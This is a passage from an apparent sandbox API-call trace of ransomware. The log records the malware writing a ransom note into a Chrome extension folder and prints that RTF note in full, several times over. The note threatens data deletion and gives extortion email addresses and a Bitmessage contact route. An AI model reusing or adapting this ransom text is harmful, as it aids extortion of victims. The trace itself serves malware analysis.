g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÀv¤Aô\x81éwª1\x9c`\x8fºÊ\x11òÜ\"\x8dP-?Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.298] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.299] CloseHandle (hObject=0x294) returned 1 [0285.299] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\#readme_eman#.rtf")) returned 0xffffffff [0285.299] GetLastError () returned 0x2 [0285.299] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.300] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.300] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.300] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 